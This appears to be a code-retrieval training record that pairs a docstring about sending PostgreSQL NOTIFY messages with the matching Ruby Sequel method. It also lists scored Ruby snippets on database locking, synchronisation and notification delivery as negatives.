"def sync\n cached_dataset(:_sync) do\n clone(:async=>false)\n end\n end",
"def databases\n unless defined?(@databases)\n # only use mutex on initialization\n MUTEX.synchronize do\n # return if another process initialized while we were waiting\n return @databases if defined?(@databases)\n\n @databases = config[\"databases\"].map { |id, c| [id.to_sym, Database.new(id, c)] }.to_h\n end\n end\n\n @databases\n end",
"def all\n db.transaction(true) do\n ids = extract_model_ids(db)\n ids.map { |key| db[key] }\n end\n end",
"def return_lock\n\t\t@@logger.info { \"Returning the lock to the database.\" } if have_logger?\n\t\tTournament.dataset.filter(:id => self.id, :locked => true).update(:locked => false) != 0\n\tend",
"def skip_locked\n cached_dataset(:_skip_locked_ds) do\n raise(Error, 'This dataset does not support skipping locked rows') unless supports_skip_locked?\n clone(:skip_locked=>true)\n end\n end",
"def dbs\n @dbs_hash.keys\n end",
"def with_database_exclusive_table_lock_sqlite(&block)\n block.call\n end",
"def acquire_lock\n\t\t@@logger.info { \"Acquiring a lock in the database.\" } if have_logger?\n\t\tTournament.dataset.filter(:id => self.id, :locked => false).update(:locked => true) != 0\n\tend",
"def lock_column_instance_filter\n lc = model.lock_column\n instance_filter(lc=>Sequel.blob(get_column_value(lc)))\n end",
"def unlock_all!\n locks.active.each(&:unlock!)\n end",
"def with_app_lock( &block )\n # acquire lock_expiration\n ok = with_connection_lock do |locked_self|\n if locked_self.lock_expiration.nil? then\n row.update_all lock_expiration: Time.now + DELTA\n true\n end\n end\n # use and release lock_expiration outside of the connection_lock\n if ok then\n begin\n block.call\n ensure\n row.update_all lock_expiration: nil\n end\n end\n end",
"def load_static_cache_rows\n if rows = Sequel.synchronize{@static_cache_cache[name]}\n rows.map{|row| call(row)}.freeze\n else\n rows = dataset.all.freeze\n raw_rows = rows.map(&:values)\n Sequel.synchronize{@static_cache_cache[name] = raw_rows}\n rows\n end\n end",
"def sqls\n @mutex.synchronize do\n s = @sqls.dup\n @sqls.clear\n s\n end\n end",
"def pending_modified_values\n @dbi.pending_modified_values\n end",
"def pending_modified_values\n @dbi.pending_modified_values\n end",
"def set_lock\n klass = self.class\n lock_column_name = klass.locking_column\n\n if has_attribute?(lock_column_name) && klass.parent_relation_keys.count > 0\n criteria = klass.parent_relation_keys.inject({}) do |result, parent_key|\n result[parent_key] = read_attribute(parent_key)\n result\n end\n relation = klass.unscoped.where(criteria)\n\n sql = <<-SQL\n #{relation.select(\"COUNT(#{lock_column_name}) AS value, 0 sort_order\").to_sql}\n UNION\n #{relation.select(\"MAX(#{lock_column_name}) AS value, 1 sort_order\").to_sql}\n ORDER BY sort_order\n SQL\n\n result = klass.connection.execute(sql)\n current_count = result[0][\"value\"]\n current_max = result[1][\"value\"]\n\n lock_value = (current_count.to_s == \"0\" ? 0 : current_max.to_i + 1)\n\n write_attribute(lock_column_name, lock_value)\n end\n end",
"def flush_access_log\n return nil if @logs_access_pending.empty?\n\n @logs_mutex.synchronize do\n ins_arr = @logs_access_pending\n @logs_access_pending = []\n inserts = []\n inserts_links = []\n\n ins_arr.each do |ins|\n gothrough = [{\n :col => :get_keys_data_id,\n :hash => ins[:get],\n :type => :keys\n },{\n :col => :get_values_data_id,\n :hash => ins[:get],\n :type => :values\n },{\n :col => :post_keys_data_id,\n :hash => ins[:post],\n :type => :keys\n },{\n :col => :post_values_data_id,\n :hash => ins[:post],\n :type => :values\n },{\n :col => :cookie_keys_data_id,\n :hash => ins[:cookie],\n :type => :keys\n },{\n :col => :cookie_values_data_id,\n :hash => ins[:cookie],\n :type => :values\n },{\n :col => :meta_keys_data_id,\n :hash => ins[:meta],\n :type => :keys\n },{\n :col => :meta_values_data_id,\n :hash => ins[:meta],\n :type => :values\n }]\n ins_hash = {\n :session_id => ins[:session_id],\n :date_request => ins[:date_request]\n }\n\n gothrough.each do |data|\n if data[:type] == :keys\n hash = Knj::ArrayExt.hash_keys_hash(data[:hash])\n else\n hash = Knj::ArrayExt.hash_values_hash(data[:hash])\n end\n\n data_id = @ob.static(:Log_data, :by_id_hash, hash)\n if !data_id\n data_id = @db.insert(:Log_data, {\"id_hash\" => hash}, {:return_id => true})\n\n link_count = 0\n data[:hash].keys.sort.each do |key|\n if data[:type] == :keys\n ins_data = \"#{key.to_s}\"\n else\n ins_data = \"#{data[:hash][key]}\"\n end\n\n ins_data = ins_data.force_encoding(\"UTF-8\") if ins_data.respond_to?(:force_encoding)\n data_value_id = @ob.static(:Log_data_value, :force_id, ins_data)\n inserts_links << {:no => link_count, :data_id => data_id, :value_id => data_value_id}\n link_count += 1\n end\n end\n\n ins_hash[data[:col]] = data_id\n end\n\n hash = Knj::ArrayExt.array_hash(ins[:ips])\n data_id = @ob.static(:Log_data, :by_id_hash, hash)\n\n if !data_id\n data_id = @db.insert(:Log_data, {\"id_hash\" => hash}, {:return_id => true})\n\n link_count = 0\n ins[:ips].each do |ip|\n data_value_id = @ob.static(:Log_data_value, :force_id, ip)\n inserts_links << {:no => link_count, :data_id => data_id, :value_id => data_value_id}\n link_count += 1\n end\n end\n\n ins_hash[:ip_data_id] = data_id\n inserts << ins_hash\n end\n\n @db.insert_multi(:Log_access, inserts)\n @db.insert_multi(:Log_data_link, inserts_links)\n @ob.unset_class([:Log_access, :Log_data, :Log_data_link, :Log_data_value])\n end\n end",
"def lockdiscovery\n []\n end",
"def lock; end",
"def lock; end",
"def lock; end",
"def transactions\n read_all_transactions\n transaction_cache\n end",
"def lock\n end",
"def all_dbs\n @conn.query({url_path: \"_all_dbs\", method: :get})\n end",
"def all\n ::ActiveRecord::Base.connection_pool.with_connection do\n execute(:all).to_a\n end\n end",
"def all\n Maglev::PERSISTENT_ROOT[self].values\n end",
"def locks\n SidekiqUniqueJobs.locks\n end",
"def unlock_all\n Delayed::Job.transaction do\n Delayed::Job.where(:locked_by => hostname).update_all(:locked_by => nil, :locked_at => nil)\n end\n end",
"def freeze\n valid_connection_sql\n metadata_dataset\n @opts.freeze\n @loggers.freeze\n @pool.freeze\n @dataset_class.freeze\n @dataset_modules.freeze\n @schema_type_classes.freeze\n @loaded_extensions.freeze\n # SEQUEL5: Frozen by default, remove this\n @default_dataset.freeze\n metadata_dataset.freeze\n super\n end",
"def all_data\n @data\n end",
"def get_available_database_ids\n get_available_databases.map{|item| item[:id]}\n end",
"def locked; end",
"def synchronize_resultset; end",
"def all\n Maglev::PERSISTENT_ROOT[self].values\n end",
"def get_all_consistency_group_snapshots\n all_snapshots = []\n consistency_groups = get_all_consistency_groups\n consistency_groups.each do |data|\n cg_id=data['id']\n storage_system=data['storagesystem']\n cg_snapshots = get_consistency_group_snapshots(storage_system,cg_id)\n all_snapshots << cg_snapshots\n end\n all_snapshots = all_snapshots.reduce(:concat)\n end",
"def table_readers\n data_session.table_readers\n end",
"def dataset\n database[table_name]\n end",
"def data_caches\n (@data_caches || [])\n end",
"def databases\n get '_all_dbs'\n end",
"def keys\n db.keys\n end",
"def free_lock\n session.execute(@free_lock_stmt, workspace_id, worker_id).each do |row|\n return row['[applied]']\n end\n end",
"def locked\n end",
"def synchronize_resultset\n # make it reentrant\n return yield if defined?(@resultset_locked) && @resultset_locked\n\n begin\n @resultset_locked = true\n File.open(resultset_writelock, \"w+\") do |f|\n f.flock(File::LOCK_EX)\n yield\n end\n ensure\n @resultset_locked = false\n end\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def all\n readonly.\n order(\"#{table_name}.recorded_at, hid\").all\n end",
"def blocking\n sql = %q(\n select bl.pid as blocked_pid,\n ka.current_query as blocking_statement,\n now() - ka.query_start as blocking_duration,\n kl.pid as blocking_pid,\n a.current_query as blocked_statement,\n now() - a.query_start as blocked_duration\n from pg_catalog.pg_locks bl\n join pg_catalog.pg_stat_activity a\n on bl.pid = a.procpid\n join pg_catalog.pg_locks kl\n join pg_catalog.pg_stat_activity ka\n on kl.pid = ka.procpid\n on bl.transactionid = kl.transactionid and bl.pid != kl.pid\n where not bl.granted)\n\n exec_sql(sql, find_uri)\n end",
"def lock(mode, &block)\n sql = LOCK % [source_list(@opts[:from]), mode]\n @db.synchronize do\n if block # perform locking inside a transaction and yield to block\n @db.transaction {@db.execute(sql); yield}\n else\n @db.execute(sql) # lock without a transaction\n self\n end\n end\n end",
"def all\n @data\n end",
"def obsolete_data_sets\n data_sets.take_while { |ds| ds != active_data_set }.slice(0...-1)\n end",
"def obsolete_data_sets\n data_sets.take_while { |ds| ds != active_data_set }.slice(0...-1)\n end",
"def jobs\n db[TABLE_NAME]\n rescue ::Sequel::DatabaseError => e\n retry if on_error e\n end",
"def locks(uri, return_child_locks)\n new_locks = []\n\n locks = data\n\n locks.each do |lock|\n next unless lock.uri == uri ||\n # deep locks on parents\n (lock.depth != 0 && uri.index(\"#{lock.uri}/\") == 0) ||\n # locks on children\n (return_child_locks && lock.uri.index(\"#{uri}/\") == 0)\n new_locks << lock\n end\n\n # Checking if we can remove any of these locks\n new_locks.each_with_index do |lock, k|\n new_locks.delete_at(k) if Time.now.to_i > lock.timeout + lock.created\n end\n new_locks\n end",
"def cache\n rows.each(&:cache)\n end",
"def select_lock_sql(sql)\n @opts[:lock] == :update ? sql : super\n end",
"def lock_type\n @lock_type ||= :mysql\n end",
"def list options = {}, &block\n options.to_options!\n Bj.transaction(options) do\n options.delete :rails_env\n table.job.all(options)\n end\n end",
"def all\n storage\n end",
"def all\n data\n end",
"def seek_record_ids_pool(duration: , table_name: )\n _datetimes = duration.ago.beginning_of_minute..Time.now.beginning_of_minute\n _cache_key = \"seek_records_pool:#{duration}\" << Digest::MD5.hexdigest(_datetimes.to_s)\n\n _seek_records_pool = Rails.cache.fetch(_cache_key, expires_in: 5.minutes) do\n _records = SesameMall::Source::SeekRecord.where(\n created_at: _datetimes\n )\n\n _records.pluck_s(:table_name, :primary_key_value).inject({}) {|memo, values|\n memo[values.table_name] ||= []\n memo[values.table_name] << values.primary_key_value\n\n memo\n }\n end\n\n _seek_records_pool[table_name]\n end",
"def nolock\n clone(:table_options => \"(NOLOCK)\")\n end",
"def lock_database\n lock_command = <<-EOS\n echo 'use admin\n db.runCommand({\"fsync\" : 1, \"lock\" : 1})' | #{mongo_shell}\n EOS\n\n run(lock_command)\n end",
"def lock_database\n lock_command = <<-EOS.gsub(/^ +/, ' ')\n echo 'use admin\n db.runCommand({\"fsync\" : 1, \"lock\" : 1})' | #{ \"#{ mongo_utility } #{ mongo_uri }\" }\n EOS\n\n run(lock_command)\n end",
"def locked_mds\n locked_mds = {}\n Matchday.all.each do |m|\n locked_mds[m.week] = m.locked\n end\n locked_mds\n end",
"def index\n @dataset_data = DatasetDatum.all\n end",
"def select_lock_sql(sql)\n lock = @opts[:lock]\n if lock == :share\n sql << ' FOR SHARE'\n else\n super\n end\n\n if lock\n if @opts[:skip_locked]\n sql << \" SKIP LOCKED\"\n elsif @opts[:nowait]\n sql << \" NOWAIT\"\n end\n end\n end",
"def selection_data\n dataset ||= DB[:selections]\n end",
"def lock\n doc['lock']\n end",
"def synchronize(*)\n if ActiveRecord.version >= Gem::Version.new(\"5.1.0\")\n activerecord_connection.lock.synchronize do\n yield activerecord_raw_connection\n end\n else\n yield activerecord_raw_connection\n end\n end",
"def with_locked_file(filename)\n puts \"locking #{filename}\"\n if dataset_marked?(filename, 'locked') \n raise \"already marked as locked\"\n end\n # actual locking\n mark_dataset(filename, 'locked')\n begin\n yield\n ensure\n puts \"unlocking #{filename}\"\n # actual unlocking\n unmark_dataset(filename, 'locked')\n end\n end",
"def delayed_atomic_sets\n @delayed_atomic_sets ||= {}\n end",
"def tasks_info\n all_tasks = Set.new\n all_job_info = {}\n history.each_key do |cycle_index|\n tasks, job_info = tasks_info_of_snapshot(cycle_index)\n all_tasks.merge(tasks)\n all_job_info.merge!(job_info)\n end\n [all_tasks, all_job_info]\n end",
"def all_items\n @allitems ||= syncitems :lastsync => \"1970-01-01 00:00:00\"\n end",
"def index\n @db_jobs = DbJob.all\n end",
"def sql_on_all_sids( command, parameters = {})\n results = []\n oratab = OraTab.new\n oratab.running_database_sids.each do |sid|\n results = results + sql(command, {:sid => sid}.merge(parameters))\n end\n results\n end",
"def commit_time_data\n @buckets\n end",
"def visit_Arel_Nodes_Lock(o, collector)\n collector\n end",
"def current_data\n db_file.data\n end",
"def _indexes_ds\n @_indexes_ds ||= begin\n if server_version >= 90500\n order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]\n # :nocov:\n else\n range = 0...32\n order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]\n # :nocov:\n end\n\n attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])\n\n ds = metadata_dataset.\n from{pg_class.as(:tab)}.\n join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).\n join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).\n join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).\n left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).\n where{{\n indc[:relkind]=>%w'i I',\n ind[:indisprimary]=>false,\n :indexprs=>nil,\n :indisvalid=>true}}.\n order(*order).\n select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}\n\n # :nocov:\n ds = ds.where(:indisready=>true) if server_version >= 80300\n ds = ds.where(:indislive=>true) if server_version >= 90300\n # :nocov:\n\n ds\n end\n end"
] |
[
"0.6448412",
"0.63300234",
"0.6222221",
"0.5978553",
"0.5910206",
"0.58808726",
"0.57571405",
"0.5666715",
"0.56507355",
"0.56354165",
"0.5576385",
"0.5576385",
"0.5563828",
"0.55490714",
"0.55186725",
"0.54743737",
"0.5468267",
"0.54595023",
"0.54589605",
"0.5430492",
"0.5408446",
"0.5406485",
"0.538636",
"0.53806484",
"0.53779334",
"0.5370447",
"0.5356664",
"0.53509855",
"0.5341294",
"0.5331975",
"0.5297492",
"0.5293648",
"0.52825725",
"0.52559626",
"0.52550346",
"0.5253806",
"0.5253806",
"0.52527744",
"0.5238721",
"0.5234725",
"0.5215464",
"0.5215464",
"0.5215464",
"0.5203778",
"0.51963663",
"0.5194969",
"0.5194465",
"0.51871467",
"0.51828456",
"0.51742655",
"0.51660734",
"0.5157165",
"0.5145782",
"0.5143423",
"0.5135636",
"0.5129813",
"0.51175493",
"0.51151454",
"0.51026",
"0.51016825",
"0.50861233",
"0.5077034",
"0.50587803",
"0.5058413",
"0.5055221",
"0.5048262",
"0.5037618",
"0.5036396",
"0.5024882",
"0.5023136",
"0.500825",
"0.500825",
"0.49936846",
"0.4984589",
"0.49824005",
"0.49650446",
"0.49646607",
"0.49641162",
"0.4962873",
"0.4953791",
"0.49527118",
"0.49487048",
"0.49329132",
"0.49321663",
"0.49315956",
"0.49262562",
"0.4925115",
"0.4919216",
"0.4918508",
"0.49152496",
"0.491465",
"0.49123138",
"0.4908539",
"0.49018613",
"0.48963407",
"0.48932636",
"0.48856616",
"0.48837113",
"0.48825517",
"0.48787114"
] |
0.80763364
|
0
|
Notifies the given channel. See the PostgreSQL NOTIFY documentation. Options: :payload :: The payload string to use for the NOTIFY statement. Only supported in PostgreSQL 9.0+. :server :: The server to which to send the NOTIFY statement, if the sharding support is being used.
|
def notify(channel, opts=OPTS)
sql = String.new
sql << "NOTIFY "
dataset.send(:identifier_append, sql, channel)
if payload = opts[:payload]
sql << ", "
dataset.literal_append(sql, payload.to_s)
end
execute_ddl(sql, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def notify_channel(connection, channel, payload)\n connection.execute(\"NOTIFY #{channel}, #{payload}\")\n end",
"def notify msg, channel \n if @slack_url == '' \n puts \"No slack webhook url specified\"\n return\n end\n \n hash = {:text => msg, :channel => channel}\n json = JSON.generate(hash)\n payload = \"payload=#{json}\"\n\n `curl -X POST --data-urlencode '#{payload}' #{@slack_url}`\n end",
"def notify_observers(*args)\n return unless changed?\n\n unwrap(connection).exec \"NOTIFY #{channel}, #{args}\"\n\n changed false\n end",
"def notify(mid, *args, **kwargs)\n @notification_name = mid\n do_notify(*args, **kwargs)\n end",
"def notify(payload)\n\t\tgeneration_id = [@parameters['generation_id']]\n\t\toptions = {data: { payload: payload } }\n\tend",
"def broadcast_to_channel\n if Setting.first.reminders_enabled\n ActionCable.server.broadcast 'notification_channel', notification: self.to_serialize\n end\n end",
"def channel_notice(chan, notice)\n @connection.send(\"NOTICE #{chan} :#{notice}\")\n end",
"def send_notification *args, &block\n if args.length == 1 && args.first.kind_of?( Rpc::Notification )\n _send_request args.first\n elsif args.length == 1 && args.first.kind_of?( Hash )\n h = args.first\n send_notification( h[\"method\"], h[\"params\"], &block )\n elsif args.length == 2\n _send_request Rpc::Notification.new(self, *args)\n else\n raise Rpc::ServerError(-1, extra_msg: \"in Rpc::Connection.send_notification : Wrong number of argument.\", args: args)\n end\n end",
"def onotify (channel, *args)\n\n do_notify(:all, channel, *args)\n do_notify(channel, channel, *args)\n end",
"def notify_by_push\n PushNotification.new(user: context.user,\n message: context.message,\n n_type: context.n_type,\n data: { from_id: context.user_from.try(:id), from_name: context.user_from.try(:name),\n donation_id: context.donation.try(:id) })\n .simple_notification\n end",
"def notify(params)\n client.post('/notify', params)\n end",
"def notify_game_change\n connection.execute \"NOTIFY #{channel}, #{connection.quote self.to_s}\"\n end",
"def set_notification_channel\n @notification_channel = NotificationChannel.find(params[:id])\n end",
"def send_notification(msg)\n $BLIX_NOTIFY.push(msg)\n puts \"[DummyServer] notify: message=#{msg}\" if $DEBUG\n end",
"def listen(channel, action)\n actions[channel] = action\n pg_connection.exec(%[LISTEN \"#{channel}\";])\n end",
"def notify(*args, **kwargs)\n new.notify(*args, **kwargs)\n end",
"def publish(channel, data)\n send_action('publish', channel, data)\n end",
"def notify!(mid, *args, **hargs)\n notify(mid, *args, **hargs, sync: true)\n end",
"def publish(channel, event, data)\n Pusher[channel].trigger(event,data)\n end",
"def publish(channel, message = '')\n Connection.publish(channel, message)\n end",
"def broadcast_to_channel(channel)\n\t\tmessage = { :channel => channel, :data => channel }.to_json\n\t\turi = URI.parse(PUSH_SERVER)\n\t\tNet::HTTP.post_form(uri, :message => message)\n\tend",
"def notify!(mid, *args, **hargs)\n notify(mid, *args, **hargs, sync: true)\n end",
"def notify(step, options = {})\n notifiers.each do |notifier|\n notifier.notify(step, default_payload.merge(options))\n end\n end",
"def notify_slack!\n post_to_slack(\n ENV['USER_SIGNUP_CHANNEL'],\n to_slack_notification!\n )\n end",
"def notify(message, options={})\n title = options.delete(:title) || 'Rulebow Notification'\n Notify.notify(title, message.to_s, options)\n end",
"def publish( channel, message )\n # Check we are not publishing to a wildcard channel\n STDERR.puts 'Can\\'t publish to a wildcard channel!' if is_channel_wildcard?(channel)\n @client.publish(channel, message)\n end",
"def publish_to(channel, data)\n publish_message(message(channel, data))\n end",
"def notify(method, *args)\n send_notify(method, args)\n nil\n end",
"def notify(token, notification = nil)\n client.notify app_id, token, notification\n end",
"def notify sender_id:, referent:, instance:, users:, params: {}\n notify_push(sender_id: sender_id, referent: referent, instance: instance, users: users, params: params)\n notify_inapp(sender_id: sender_id, referent: referent, instance: instance, users: users, params: params)\n end",
"def notify(message)\n client.register(nick)\n client.notify(message)\n client.quit\n\n puts \"New message has been notified on IRC: #{message}\"\n end",
"def publish_to(channel, data)\n publish_message(message(channel, data))\n end",
"def notify_change(input_channel)\n\n $test_logger.log(\"Notify change #{input_channel}\")\n\n case input_channel\n\n #If XML is changed\n when InputChannel::XML\n\n if @is_reply_ilv == true\n $test_logger.log(\"XML to hex/raw not processed as current ILV is reply ILV!\")\n else\n @ilv_hex_str = xml_to_hex(@xml_ilv_node)\n @ilv_raw_str = ILVMessage.hex_to_raw(@ilv_hex_str)\n end\n\n #If HEX string is changed\n when InputChannel::HEX\n @ilv_raw_str = ILVMessage.hex_to_raw(@ilv_hex_str)\n raw_to_xml(@xml_ilv_node, @ilv_raw_str)\n\n #If RAW string is changed\n when InputChannel::RAW\n @ilv_hex_str = ILVMessage.raw_to_hex(@ilv_raw_str)\n raw_to_xml(@xml_ilv_node, @ilv_raw_str)\n\n else\n raise \"Invalid channel specified '#{input_channel}'!\"\n end\n end",
"def push_notification\n pusher_client = Pusher::Client.new(\n app_id: '194717',\n key: 'c7a6150d22d40eea7bca',\n secret: '76c36e83b489767cef0a',\n encrypted: true\n )\n\n pusher_client.trigger('test_channel', 'my_event', {\n message: 'Event'\n })\n\n end",
"def perform(channel, message)\n Redis.current.publish(\n '__anycable__', MultiJson.dump(\n stream: channel,\n command: 'message',\n data: MultiJson.dump(message)\n )\n )\n end",
"def perform text, options = {}\n Utils::SlackNotifier.instance.notify(text, options)\n end",
"def broadcast\n notification = receiver.notifications.last\n case type\n when TYPES[:USER_HAS_BEEN_ASSIGNED_SHIFT]\n ActionCable.server.broadcast \"#{NotificationChannel::CHANNEL_NAME}_#{receiver.id}\",\n {\n type: type,\n payload: NotificationSerializer.new(notification, root: false)\n }.to_json\n end\n end",
"def publish(channel, message); end",
"def publish(channel, message); end",
"def publish_to(channel, data)\n\t\t\tpublish_message(message(channel, data))\n\t\tend",
"def send_execution_notification\n payload = execution_notification_payload\n trade_order.portfolio.user.notify_devices payload, self\n end",
"def createNotificationChannel(channel_type, content_type, version=1.0)\n url = \"#{@fqdn}#{NOTIFICATION_RESOURCE}\"\n headers = { \n :accept => 'application/json', \n :content_type => \"application/json\",\n }\n body = Webhooks.createChannel(channel_type, content_type, version)\n\n begin\n r = self.post(url, body.to_json, headers)\n rescue RestClient::Exception => e\n raise(ServiceException, e.response || e.message, e.backtrace)\n end\n Model::NotificationChannel.from_response(r)\n end",
"def notify(msg, subject)\n end",
"def notify(exception, opts = {})\n send_notice(build_notice_for(exception, opts))\n end",
"def notify(message, options = {})\n params = { message: message }.merge(options)\n post('/api/notify', params, options)\n end",
"def notify(item)\n begin\n @growl.notify(@@notification_type, item.title, item.message, @priority, @sticky)\n rescue Errno::ECONNREFUSED => e\n # TODO throw custom exception\n raise \"Growl settings not configured to allow remote application registration. See Growl website docs: http://growl.info/documentation/exploring-preferences.php\"\n end\n end",
"def _perform_notify(message, opts = {})\n opts = {\n name: opts[:type].to_s,\n text: message,\n icon: opts[:image]\n }.merge(opts)\n\n _gntp_client(opts).notify(opts)\n end",
"def publish(channel, message)\n node_for(channel).publish(channel, message)\n end",
"def notify(event_type, *args)\n agent.events.notify(event_type, *args)\n rescue\n NewRelic::Agent.logger.debug('Ignoring exception during %p event notification' % [event_type])\n end",
"def notify(interests, data = {})\n Request.new(\n @pusher_client,\n :post,\n url(\"/notifications\"),\n {},\n payload(interests, data)\n ).send_sync\n end",
"def notify_user(user, message, action)\n ActionCable.server.broadcast(\n \"message_channel_#{user.aitu_id}\",\n message: {\n action: action,\n order_item: ::MessageBlueprint.render(message).to_json\n }\n )\n send_push(user, message)\n end",
"def notification=(options = {})\n if options.respond_to?(:keys)\n notification.port = options[:port] if options[:port]\n notification.host = options[:host] if options[:host]\n end\n end",
"def notify(type,subject,target=nil)\n self.notices.create :type => type, :subject => subject, :target => target\n end",
"def publish(channel, event, &block)\n FayeMessage.new.publish(event, channel, capture(&block))\n end",
"def notify(exception, options = {})\n send_notice(build_notice_for(exception, options))\n end",
"def subscribe(channel, data = {})\n log_to_file(\"#{self.class} tries to subscribe to channel #{channel} with #{data.inspect}\")\n send_action('subscribe', channel, data)\n end",
"def notify(message, options={}, &block)\n backtrace = filter_backtrace(options[:backtrace] || caller)\n notification = Notification.new(name, backtrace, message)\n add_notification(notification)\n end",
"def notify(optional_destination, rpc_method, *args)\n # TODO\n end",
"def push(notif)\n\n end",
"def notify(message)\n notifier = BeNotified::Notifier.new(notifier_type, message)\n notifier.notify\n end",
"def notify(subject,body,obj = nil,sanitize_text=true,notification_code=nil,send_mail=true,sender=nil)\n Mailboxer::Notification.notify_all([self],subject,body,obj,sanitize_text,notification_code,send_mail,sender)\n end",
"def publish(channel, data)\n @ws.send(get_publish_object(channel, data, increment_cnt).to_json)\n end",
"def notify(message, options = {})\n if TerminalNotifier.available?\n TerminalNotifier.silent_execute(options.merge(:message => message).map { |k,v| [\"-#{k}\", v.to_s] }.flatten)\n else\n raise \"terminal-notifier is only supported on Mac OS X 10.8, or higher.\"\n end\n end",
"def _perform_notify(message, options = {})\n change_color = options[:change_color]\n locations = Array(options[:color_location])\n display_the_title = options[:display_title]\n display_message = options[:display_message]\n type = options[:type].to_s\n title = options[:title]\n\n if change_color\n color = _tmux_color(type, options)\n locations.each do |location|\n Client.new(client(options)).set(location, color)\n end\n end\n\n _display_title(type, title, message, options) if display_the_title\n\n return unless display_message\n _display_message(type, title, message, options)\n end",
"def notify(subscriber, *args, &block)\n if subscriber.respond_to? MESSAGE\n subscriber.public_send(MESSAGE, self, *args, &block)\n end\n end",
"def send_message(email, text)\n @notification_server.send_message email, text\n end",
"def notify\n socket.write('x')\n end",
"def growl_notify\n\t\t\toptions = { :title => @application,\n\t\t\t\t\t\t\t\t\t:description => @message.gsub(/[\\n]+/, \"\"),\n\t\t\t\t\t\t\t\t\t:application_name => @application,\n\t\t\t\t\t\t\t\t\t:image_from_location => @icon,\n\t\t\t\t\t\t\t\t\t:sticky => false,\n\t\t\t\t\t\t\t\t\t:priority => 0,\n\t\t\t\t\t\t\t\t\t:with_name => notifications.first }\n @growl.notify options\t\t\t\n\t\tend",
"def send_message_notification\n message = MessageBlueprint.render_as_json(self)\n ActionCable.server.broadcast \"conversation_#{ self.conversation_id }_notification_channel\", message\n # receiver = self.conversation.user_one_id == self.user_id ? self.conversation.user_two_id : self.conversation.user_one_id\n # response = self.attributes.merge(user: self.user&.name)\n # ActionCable.server.broadcast \"user_#{ receiver }_notification_channel\", response.as_json.to_s\n end",
"def notify_topic(message, options: nil, &block)\n command = make_simple_command(:post, 'messages:send', options)\n command.request_representation = Google::Apis::Messages::Message::Representation\n command.request_object = message\n\n if !ENV['FIREBASE_DEBUG'].nil?\n log_json(command)\n end\n\n execute_or_queue_command(command, &block)\n end",
"def notify(event, message, *args)\n api_key = args.first.is_a?(String) || args.first.is_a?(Array) ? args.shift : self.api_key\n\n raise ConfigurationError, \"You must provide an API key to send notifications\" if api_key.nil?\n raise ConfigurationError, \"You must provide an application name to send notifications\" if application.nil?\n\n if args.first.is_a?(Fixnum)\n options = { :priority => args.shift, :delayed => args.shift || Prowler.delayed }\n else\n options = args.last.is_a?(Hash) ? args.pop : {}\n options = { :priority => Prowler::Priority::NORMAL, :delayed => Prowler.delayed }.merge(options)\n end\n\n options.merge!(\n :application => application, :providerkey => provider_key,\n :apikey => api_key, :event => event, :description => message\n )\n\n if options.delete(:delayed)\n enqueue_delayed_job(options)\n else\n perform(:add, options, :post, Success)\n end\n end",
"def send_irc(channel, message)\n real_channel = @zbot.get_channel(channel)\n if real_channel\n real_channel.send(message)\n else\n puts \"############## CHANNEL #{channel} NOT FOUND !\"\n end\n end",
"def send_message(event, payload = nil, destination = nil)\n Redis.publish('slanger:cluster', {sender: node_id, destination: destination, event: event, payload: payload}.to_json)\n end",
"def notification_params\n params.require(\"notification\").\n permit( :message, :dcm_topic_id, :sse_channel)\n end",
"def notify_receiver\n conversation = ConversationBlueprint.render_as_json(self, view: :normal)\n ActionCable.server.broadcast \"user_#{ self.user_two_id }_notification_channel\", conversation\n end",
"def notify(body, subject = \"Mail from automation\")\n url = \"#{@base_rpm_url}/v1/steps/#{@params[\"step_id\"]}/notify?token=#{@token}\"\n data = {\"filters\"=>{\"notify\"=>{\"body\"=> body, \"subject\"=> subject}}}\n result = rest_call(url, \"get\", {\"data\" => data})\n end",
"def notify(data)\n message = data[:message]\n value = data[:value]\n\n unless message && value\n raise ArgumentError, 'You need to set :message and :value to send notify.'\n end\n\n @notifiers.each do |notifier, options|\n # .dup is NOT reliable\n options_copy = Marshal.load(Marshal.dump(options))\n notifier.new(options_copy).notify(@name, message, value)\n end\n end",
"def send_notification(msg)\n EM.next_tick do\n @do_notify.call(msg)\n end\n end",
"def notify module_id, msg\n msg[:client_id] = @client_id\n msg[:username] = @username\n @ws.send ['client', compose_request(nil, module_id, msg)].to_json\n end",
"def channel(name)\n arn = self.fetch(name)\n region = arn.split(':')[3]\n notifier_builder.new(region: region).topics[arn]\n end",
"def notify(message)\n puts message['data']\n end",
"def invite(nickname, channel)\n send_data(\"INVITE #{nickname} #{channel}\")\n end",
"def createMIMNotificationChannel(content_type, version=1.0)\n self.createNotificationChannel(\"MIM\", content_type, version)\n end",
"def test_notify\n gcm_response = send_notification(params[:test_payload_to_send], params[:test_gcm_ids])\n\n render json: get_v1_formatted_response({}, true, [gcm_response[:response]]).to_json\n end",
"def channel\n @channel ||= Proletariat.connection.create_channel\n end",
"def channel\n @channel ||= Proletariat.connection.create_channel\n end",
"def _perform_notify(message, opts = {})\n opts = opts.merge(\n summary: opts[:title],\n icon_path: opts[:image],\n body: message,\n urgency: opts[:urgency] || (opts[:type] == \"failed\" ? :normal : :low)\n )\n\n ::Libnotify.show(opts)\n end",
"def topic(channel, str)\n sendmsg \"TOPIC #{channel} :#{str}\"\n end",
"def listen_to_channel(connection, channel, &block)\n connection.execute(\"LISTEN #{channel}\")\n\n loop do\n connection.raw_connection.wait_for_notify(10) do |event, pid, payload|\n return if yield payload\n end\n end\n ensure\n connection.execute(\"UNLISTEN *\")\n end",
"def topic(channel, topic = nil)\n topic = \":#{topic}\" if topic\n send_msg(\"TOPIC #{channel} #{topic}\")\n end",
